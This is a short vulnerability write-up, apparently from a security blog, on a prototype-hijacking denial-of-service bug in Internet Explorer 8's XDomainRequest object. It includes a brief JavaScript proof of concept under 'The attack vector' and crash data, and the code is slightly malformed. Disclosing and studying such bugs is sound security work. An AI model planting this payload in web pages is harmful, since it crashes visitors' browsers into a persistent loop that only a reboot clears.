*UPDATE* I placed the wrong PoC, I had several of test cases and the one below should work.
Abstract.
Internet Explorer 8 is vulnerable to prototype hijacking c.q. function aliasing on the XDR object. The XDomainRequest object is a new feature in Internet Explorer that allows cross domain XML calls. By default the feature only allows cross domain calls when both parties agree upon the made request, this involves XDomainRequestAllowed to be appended to the response header from the host in question, to which the request was made. Since this is a very dangerous object, I went on to explore this new feature in order to review it's security aspect a little more. It didn't take long to find a serious issue regarding prototype hijacking on the XDomainRequest object which leads to a denial of service which only can be recovered from after a full OS re-boot. The reason why it is vulnerable is due to a the feature in Internet Explorer that tries to re-create a session window when a window crashes. This happens automatically without user interference, and therefore the denial of service will be persistent.
The problem.
It is almost similar to prototype hijacking first described by Stefano Di Paola on xmlhttprequests back in 2006.[1] with the difference that it triggers a denial of service instead of a hijacked request. I create a function that instantiate a new XDR object every time the 'xdr' variable is called. Which I think leads to function aliasing. Obviously Internet Explorer chokes on it, and crashes the window we work in. Then Internet Explorer tries to re-open the window, see figure 1.
Figure 1.
As seen in figure 2, trying to shut down iexplore.exe in the Windows task manager results in a new browser being launched that re-creates the window session, after killing it, Internet Explorer instantiates a new browser and hangs again, and so on.
Figure 2.
It almost behaves like a Trojan which cannot be killed :)
The attack vector.
<script>
// trying prototype hijacking here.
xdr = XDomainRequest;
XDomainRequest = function()
return new XDomainRequest();
}
ping = 'hello';
xdr = new XDomainRequest();
xdr.open("POST", "http://cnn.com");
xdr.send(ping);
</script>
Crash data:
AppName: iexplore.exe AppVer: 8.0.6001.17184 ModName: ieframe.dll
ModVer: 8.0.6001.17184 Offset: 0003f8cb
Conclusion.
More research is needed on this XDR object to fully grasp the risk of this new feature. The given attack and PoC was performed with browserfry.[2] and results may vary.
References:
[1] Subverting Ajax - http://www.wisec.it/docs.php?id=4 (PDF file)
[2] http://browserfry.0x000000.com
